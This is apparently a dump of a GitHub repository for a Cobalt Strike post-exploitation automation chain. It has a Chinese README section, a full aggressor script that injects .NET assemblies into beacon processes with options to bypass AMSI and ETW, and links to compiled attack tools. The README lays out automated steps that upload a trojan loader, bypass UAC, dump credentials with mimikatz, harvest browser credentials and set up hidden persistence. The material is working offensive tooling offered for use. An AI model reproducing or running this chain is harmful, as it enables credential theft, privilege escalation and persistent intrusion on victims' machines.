#### 配置用户执行链 137 | 138 | 取消注释以下代码 139 | 140 | ![image-20240311214050853](image/image-20240311214050853.png) 141 | 142 | **这里用两个场景函数进行编排示例:** 143 | 144 | - `NormalUser_Chain` 函数用来编排不需要管理员权限即可执行的操作如信息收集、屏幕截图、上传文件等; 145 | - `OnlyAdmin_Chain` 函数用来编排只有管理员权限才能做的操作比如凭据获取、隐蔽权限维持等。 146 | 147 | **其中 `NormalUser_Chain` 执行流程如下:** 148 | 149 | 1. 
上传木马到指定目录: 150 | 151 | ```shell 152 | sub UP_Loader { 153 | bcd($1, $LoaderPath); 154 | blog($1,"\c9开始上传 Loader"); 155 | bupload($1, script_resource("/scripts/".$LoaderName)); 156 | blog($1, "\c8Loader 文件上传完成"); 157 | blog($1, "\c8Loader文件位置:$LoaderFullPath"); 158 | } 159 | ``` 160 | 161 | 2. 调用 `readbof` 函数加载 BOF 并执行 whoami、ipconfig、screenshot ; 162 | 163 | 3. 调用 `inlineExecute-Assembly` 函数通过 SharpHostInfo 扫描当前 C 端主机信息。 164 | 165 | > ScreenshotBOFPlus 优化了能在无需注入的情况下在 Windows 启动全局缩放时获取完整截图 166 | 167 | 而 ` BypassUAC` 调用 `inlineExecute-Assembly` 函数执行 SharpBypassUAC 工具通过 `computerdefaults` 技术以及编码后的木马路径进行 UAC 绕过,并上线管理器权限 Session。 168 | 169 | **最后 `OnlyAdmin_Chain` 执行流程如下:** 170 | 171 | 1. 调用 `inlineExecute-Assembly` 函数执行 SharpKatz 工具内存中加载 mimikatz 获取主机凭据; 172 | 2. 执行 Pillager BOF 程序不落地的情况下收集主机浏览器、软件、账户凭据等敏感信息; 173 | 3. 调用 `inlineExecute-Assembly` 函数执行 SharpSchTask 工具进行隐蔽权限维持。 174 | 175 | ![image-20240311214005973](image/image-20240311214005973.png) 176 | 177 | #### 场景流程编排 178 | 179 | 通过 `isadmin` 结合存活权限判断实现上述执行场景流程的编排: 180 | 181 | ![image-20240311215101658](image/image-20240311215101658.png) 182 | 183 | 这样通过 BypassUAC 二次上线管理员权限时,将只会执行 `OnlyAdmin_Chain($1);` : 184 | 185 | ![image-20240311215420501](image/image-20240311215420501.png) 186 | 187 | 此场景流程编排仅做示例使用,请结合实际需求和实战场景移植相应 BOF 功能等技术进行配置。 188 | 189 | ## 👍 参考项目 190 | 191 | - https://github.com/h0e4a0r1t/Automatic-permission-maintenance 192 | - https://github.com/gooderbrother/antiVirusCheck 193 | - https://github.com/anthemtotheego/InlineExecute-Assembly 194 | - https://github.com/trustedsec/CS-Situational-Awareness-BOF 195 | - https://github.com/qwqdanchun/Pillager 196 | - https://github.com/baiyies/ScreenshotBOFPlus 197 | - https://github.com/shmilylty/SharpHostInfo 198 | - https://github.com/FatRodzianko/SharpBypassUAC 199 | - https://github.com/0x727/SchTask_0x727 200 | -------------------------------------------------------------------------------- /dist/Pillager/Pillager.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/Pillager.bin -------------------------------------------------------------------------------- /dist/Pillager/scloader.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/scloader.x64.o -------------------------------------------------------------------------------- /dist/Pillager/scloader.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/Pillager/scloader.x86.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecute-Assembly.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/inlineExecute-Assembly/inlineExecute-Assembly.x64.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecute-Assembly.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/inlineExecute-Assembly/inlineExecute-Assembly.x86.o -------------------------------------------------------------------------------- /dist/inlineExecute-Assembly/inlineExecuteAssembly/inlineExecute-Assembly.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "inlineExecute-Assembly", 4 | "Load CLR if not already loaded and inject .NET assembly 
into current beacon process. Avoids creating a new sacraficial process via fork and run technique", 5 | "Synopsis: inlineExecute-Assembly --dotnetassembly /path/to/Assembly.exe --assemblyargs My Args To Pass --amsi --etw"); 6 | 7 | global('$etw $amsi $appDomain $version'); 8 | 9 | #Global vars don't change 10 | $etw = 0; 11 | $revertETW = 0; 12 | $amsi = 0; 13 | $mailSlot = 0; 14 | $entryPoint = 1; 15 | 16 | #Default values set here - if you don't want to use flags to change -> change here 17 | $appDomain = "totesLegit"; 18 | $pipeName = "totesLegit"; 19 | $mailSlotName = "totesLegit"; 20 | 21 | 22 | alias inlineExecute-Assembly { 23 | 24 | #-------------------------------------- Extract/Parse Arguments --------------------------------------# 25 | $data = substr($0, 23); 26 | @args = split(' ', $data); 27 | 28 | local('$_amsi $_etw $_revertETW $_appDomain $_dotNetAssembly $_version $_assemblyargs $_assemblyWithArgs $_entryPoint $_mailSlot $_mailSlotName $_mailSlotNameArgs $_pipeName $_pipeNameArgs'); 29 | 30 | $_amsi = ""; 31 | $_etw = ""; 32 | $_revertETW = ""; 33 | $_mailSlot = ""; 34 | $_mailSlotName = ""; 35 | $_mailSlotNameArgs = ""; 36 | $_pipeName = ""; 37 | $_pipeNameArgs = ""; 38 | $_entryPoint = ""; 39 | $_appDomain = ""; 40 | $_appDomainArgs = ""; 41 | $_dotNetAssembly = ""; 42 | $_dotNetAssemblyArgs = ""; 43 | $_assemblyWithArgs = ""; 44 | 45 | @CliOptions = @("--amsi", "--etw", "--revertetw", "--dotnetassembly", "--assemblyargs", "--appdomain", "--pipe", "--mailslot", "--main"); 46 | 47 | for ($i = 0; $i < size(@args); $i++){ 48 | 49 | if (@args[$i] iswm "--etw"){ 50 | $_etw = 1; 51 | }else if (@args[$i] iswm "--amsi"){ 52 | $_amsi = 1; 53 | }else if (@args[$i] iswm "--revertetw"){ 54 | $_revertETW = 1; 55 | }else if (@args[$i] iswm "--main"){ 56 | $_entryPoint = int(0); 57 | }else if (@args[$i] iswm "--dotnetassembly"){ 58 | $i = $i + 1; 59 | $_dotNetAssembly = @args[$i]; 60 | }else if (@args[$i] iswm "--assemblyargs"){ 61 | $i = $i + 1; 62 | $count = 
0; 63 | for ($j = $i; $j < size(@args); $j++){ 64 | if(@args[$j] in @CliOptions){ 65 | break; 66 | }else{ 67 | @_dotNetAssemblyArgs[$count] = @args[$j]; 68 | 69 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 70 | if(('"' isin @_dotNetAssemblyArgs[$count] || "'" isin @_dotNetAssemblyArgs[$count])){ 71 | 72 | $k = 0; 73 | $j = $j + 1; 74 | 75 | for($k = $j; $k < size(@args); $k++){ 76 | if(lindexOf(@_dotNetAssemblyArgs[$count], '"') == (strlen(@_dotNetAssemblyArgs[$count]) - 1) || lindexOf(@_dotNetAssemblyArgs[$count], "'") == (strlen(@_dotNetAssemblyArgs[$count]) - 1)){ 77 | $k = $k - 1; 78 | break; 79 | } 80 | if('"' isin @args[$k] || "'" isin @args[$k]){ 81 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 82 | break; 83 | }else{ 84 | @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k]; 85 | } 86 | } 87 | 88 | $j = $k; 89 | $i = $k; 90 | } 91 | 92 | $count = $count + 1; 93 | 94 | } 95 | } 96 | }else if (@args[$i] iswm "--appdomain"){ 97 | $i = $i + 1; 98 | $count = 0; 99 | for ($j = $i; $j < size(@args); $j++){ 100 | if(@args[$j] in @CliOptions){ 101 | break; 102 | }else{ 103 | @_appDomain[$count] = @args[$j]; 104 | 105 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 106 | if(('"' isin @_appDomain[$count] || "'" isin @_appDomain[$count])){ 107 | 108 | $k = 0; 109 | $j = $j + 1; 110 | 111 | for($k = $j; $k < size(@args); $k++){ 112 | if(lindexOf(@_appDomain[$count], '"') == (strlen(@_appDomain[$count]) - 1) || lindexOf(@_appDomain[$count], "'") == (strlen(@_appDomain[$count]) - 1)){ 113 | $k = $k - 1; 114 | break; 115 | } 116 | if('"' isin @args[$k] || "'" isin @args[$k]){ 117 | @_appDomain[$count] = @_appDomain[$count]." ".@args[$k]; 118 | break; 119 | }else{ 120 | @_appDomain[$count] = @_appDomain[$count]." 
".@args[$k]; 121 | } 122 | } 123 | 124 | $j = $k; 125 | $i = $k; 126 | } 127 | 128 | $count = $count + 1; 129 | 130 | } 131 | } 132 | }else if (@args[$i] iswm "--mailslot"){ 133 | $_mailSlot = 1; 134 | $i = $i + 1; 135 | $count = 0; 136 | for ($j = $i; $j < size(@args); $j++){ 137 | if(@args[$j] in @CliOptions){ 138 | break; 139 | }else{ 140 | @_mailSlotName[$count] = @args[$j]; 141 | 142 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 143 | if(('"' isin @_mailSlotName[$count] || "'" isin @_mailSlotName[$count])){ 144 | 145 | $k = 0; 146 | $j = $j + 1; 147 | 148 | for($k = $j; $k < size(@args); $k++){ 149 | if(lindexOf(@_mailSlotName[$count], '"') == (strlen(@_mailSlotName[$count]) - 1) || lindexOf(@_mailSlotName[$count], "'") == (strlen(@_mailSlotName[$count]) - 1)){ 150 | $k = $k - 1; 151 | break; 152 | } 153 | if('"' isin @args[$k] || "'" isin @args[$k]){ 154 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 155 | break; 156 | }else{ 157 | @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k]; 158 | } 159 | } 160 | 161 | $j = $k; 162 | $i = $k; 163 | } 164 | 165 | $count = $count + 1; 166 | 167 | } 168 | } 169 | }else if (@args[$i] iswm "--pipe"){ 170 | $i = $i + 1; 171 | $count = 0; 172 | for ($j = $i; $j < size(@args); $j++){ 173 | if(@args[$j] in @CliOptions){ 174 | break; 175 | }else{ 176 | @_pipeName[$count] = @args[$j]; 177 | 178 | #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces). 
179 | if(('"' isin @_pipeName[$count] || "'" isin @_pipeName[$count])){ 180 | 181 | $k = 0; 182 | $j = $j + 1; 183 | 184 | for($k = $j; $k < size(@args); $k++){ 185 | if(lindexOf(@_pipeName[$count], '"') == (strlen(@_pipeName[$count]) - 1) || lindexOf(@_pipeName[$count], "'") == (strlen(@_pipeName[$count]) - 1)){ 186 | $k = $k - 1; 187 | break; 188 | } 189 | if('"' isin @args[$k] || "'" isin @args[$k]){ 190 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 191 | break; 192 | }else{ 193 | @_pipeName[$count] = @_pipeName[$count]." ".@args[$k]; 194 | } 195 | } 196 | 197 | $j = $k; 198 | $i = $k; 199 | } 200 | 201 | $count = $count + 1; 202 | 203 | } 204 | } 205 | } 206 | } 207 | #------------------------------------------------------------------------------------------------------# 208 | 209 | #-------------------------------------- Appending .NET assembly arguments --------------------------------------# 210 | 211 | #Appending .NET assembly arguments to $_assemblyWithArgs var (separated by " ") 212 | for ($i = 0; $i < size(@_dotNetAssemblyArgs); $i++){ 213 | if (@_dotNetAssemblyArgs[$i] ne "") { 214 | if ($_assemblyWithArgs ne "") 215 | { 216 | $_assemblyWithArgs = $_assemblyWithArgs." ".@_dotNetAssemblyArgs[$i]; 217 | } 218 | else 219 | { 220 | $_assemblyWithArgs = @_dotNetAssemblyArgs[$i]; 221 | } 222 | 223 | } 224 | } 225 | 226 | #---------------------------------------------------------------------------------------------------------------# 227 | 228 | #-------------------------------------- Appending appDomain arguments --------------------------------------# 229 | 230 | #Appending appDomain arguments to $_appDomainArgs var (separated by " ") 231 | for ($i = 0; $i < size(@_appDomain); $i++){ 232 | if (@_appDomain[$i] ne "") { 233 | if ($_appDomainArgs ne "") 234 | { 235 | $_appDomainArgs = $_appDomainArgs." 
".@_appDomain[$i]; 236 | } 237 | else 238 | { 239 | $_appDomainArgs = @_appDomain[$i]; 240 | } 241 | 242 | } 243 | } 244 | 245 | #-------------------------------------- Appending mailSlotName arguments --------------------------------------# 246 | 247 | #Appending mailSlot arguments to $_mailSlotNameArgs var (separated by " ") 248 | for ($i = 0; $i < size(@_mailSlotName); $i++){ 249 | if (@_mailSlotName[$i] ne "") { 250 | if ($_mailSlotNameArgs ne "") 251 | { 252 | $_mailSlotNameArgs = $_mailSlotNameArgs." ".@_mailSlotName[$i]; 253 | } 254 | else 255 | { 256 | $_mailSlotNameArgs = @_mailSlotName[$i]; 257 | } 258 | 259 | } 260 | } 261 | 262 | #-------------------------------------- Appending pipeName arguments --------------------------------------# 263 | 264 | #Appending pipeName arguments to $_pipeNameArgs var (separated by " ") 265 | for ($i = 0; $i < size(@_pipeName); $i++){ 266 | if (@_pipeName[$i] ne "") { 267 | if ($_pipeNameArgs ne "") 268 | { 269 | $_pipeNameArgs = $_pipeNameArgs." 
".@_pipeName[$i]; 270 | } 271 | else 272 | { 273 | $_pipeNameArgs = @_pipeName[$i]; 274 | } 275 | 276 | } 277 | } 278 | 279 | if ($_appDomainArgs eq "") { 280 | $_appDomainArgs = $appDomain; 281 | } 282 | if ($_mailSlotNameArgs eq "") { 283 | $_mailSlotNameArgs = $mailSlotName; 284 | } 285 | if ($_pipeNameArgs eq "") { 286 | $_pipeNameArgs = $pipeName; 287 | } 288 | if ($_amsi == "") { 289 | $_amsi = $amsi; 290 | } 291 | if ($_etw == "") { 292 | $_etw = $etw; 293 | } 294 | if ($_revertETW == "") { 295 | $_revertETW = $revertETW; 296 | } 297 | if ($_entryPoint ne int(0)) { 298 | $_entryPoint = $entryPoint; 299 | } 300 | if ($_mailSlot == "") { 301 | $_mailSlot = $mailSlot; 302 | } 303 | 304 | #---------------------------------------------------------------------------------------------------------------# 305 | 306 | #-------------------------------------- Load BOF --------------------------------------# 307 | 308 | # figure out the arch of this session 309 | $barch = barch($1); 310 | 311 | # read in the right BOF file 312 | $handle = openf(script_resource("inlineExecute-Assembly $+ $barch $+ .o")); 313 | $bof = readb($handle, -1); 314 | closef($handle); 315 | if(strlen($bof) < 1) 316 | { 317 | berror($1,"Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script"); 318 | return; 319 | } 320 | 321 | #-----------------------------------------------------------------------------------------------# 322 | 323 | #-------------------------------------- Error Handling --------------------------------------# 324 | 325 | $assemblyPath = $_dotNetAssembly; 326 | $bid = $1; 327 | if ($assemblyPath eq "") { 328 | berror($bid, "Run 'help inlineExecute-Assembly'\n"); 329 | return; 330 | } 331 | 332 | if (!-exists $assemblyPath || !-isFile $assemblyPath){ 333 | berror($bid, "File ".$assemblyPath." 
doesn't exist\n");
334 | return;
335 | }
336 |
337 | #-----------------------------------------------------------------------------------------------#
338 |
339 | #-------------------------------------- Convert .NET assembly to bytes --------------------------------------#
340 |
341 | #Reading assembly bytes and get the size in bytes
342 | $fileHandle = openf($_dotNetAssembly);
343 | $assemblyLength = lof($_dotNetAssembly);
344 | $assemblyBytes = readb($fileHandle, -1);
345 | closef($fileHandle);
346 |
347 | # pack our arguments
348 | $bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes);
349 |
350 | # announce what we're doing
351 | btask($1, "Running inlineExecute-Assembly by (@anthemtotheego)");
352 |
353 | # execute it.
354 | beacon_inline_execute($1, $bof, "go", $bofArgs);
355 |
356 | clear(@_assemblyWithArgs);
357 | clear(@_dotNetAssemblyArgs);
358 | clear(@_appDomainArgs);
359 | clear(@_appDomain);
360 | clear(@_mailSlotNameArgs);
361 | clear(@_mailSlotName);
362 | clear(@_pipeNameArgs);
363 | clear(@_pipeName);
364 |
365 | #------------------------------------------------------------------------------------------------------------------------------#
366 |
367 | }
368 |
369 |
# Event handler: Cobalt Strike raises beacon_initial on a new Beacon's first check-in ($1 = beacon id),
# so everything in this body runs automatically, with no operator confirmation step in between.
370 | on beacon_initial {
371 |
# Sleep 0 puts the Beacon in interactive mode: later tasks are dispatched immediately rather than on the next sleep interval.
372 | bsleep($1, "0");
# Console-only log line ("\c9" is a console colour code); nothing is sent to the Beacon.
373 | blog($1,"\c9Automated Post Penetration Chain");
374 | # Call the whoami helper (defined elsewhere in this script; its definition is not visible in this excerpt).
375 | whoami($1);
# Presumably the .NET loader sub whose body ends just above (its header is outside this excerpt); it receives only the beacon id,
# so the assembly path and options must come from script-level defaults — confirm against the sub's definition.
376 | executeDotNetAssembly($1);
377 | } -------------------------------------------------------------------------------- /dist/ipconfig/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/ipconfig/ipconfig.x64.o -------------------------------------------------------------------------------- /dist/ipconfig/ipconfig.x86.o:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/ipconfig/ipconfig.x86.o -------------------------------------------------------------------------------- /dist/screenshot/screenshot.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/screenshot/screenshot.x64.obj -------------------------------------------------------------------------------- /dist/screenshot/screenshot.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/screenshot/screenshot.x86.obj -------------------------------------------------------------------------------- /dist/whoami/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/whoami/whoami.x64.o -------------------------------------------------------------------------------- /dist/whoami/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/dist/whoami/whoami.x86.o -------------------------------------------------------------------------------- /image/image-20240311202300031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311202300031.png -------------------------------------------------------------------------------- /image/image-20240311203426501.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311203426501.png -------------------------------------------------------------------------------- /image/image-20240311203512109.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311203512109.png -------------------------------------------------------------------------------- /image/image-20240311212850311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311212850311.png -------------------------------------------------------------------------------- /image/image-20240311213745013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311213745013.png -------------------------------------------------------------------------------- /image/image-20240311214005973.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311214005973.png -------------------------------------------------------------------------------- /image/image-20240311214050853.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311214050853.png -------------------------------------------------------------------------------- /image/image-20240311215101658.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311215101658.png -------------------------------------------------------------------------------- /image/image-20240311215420501.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/image/image-20240311215420501.png -------------------------------------------------------------------------------- /scripts/Pillager.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/Pillager.exe -------------------------------------------------------------------------------- /scripts/SharpBypassUAC.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpBypassUAC.exe -------------------------------------------------------------------------------- /scripts/SharpHostInfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpHostInfo.exe -------------------------------------------------------------------------------- /scripts/SharpKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpKatz.exe -------------------------------------------------------------------------------- /scripts/SharpSchTask.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/lintstar/CS-AutoPostChain/804434a6e48f40ee5dadd936a3f642f528923e88/scripts/SharpSchTask.exe --------------------------------------------------------------------------------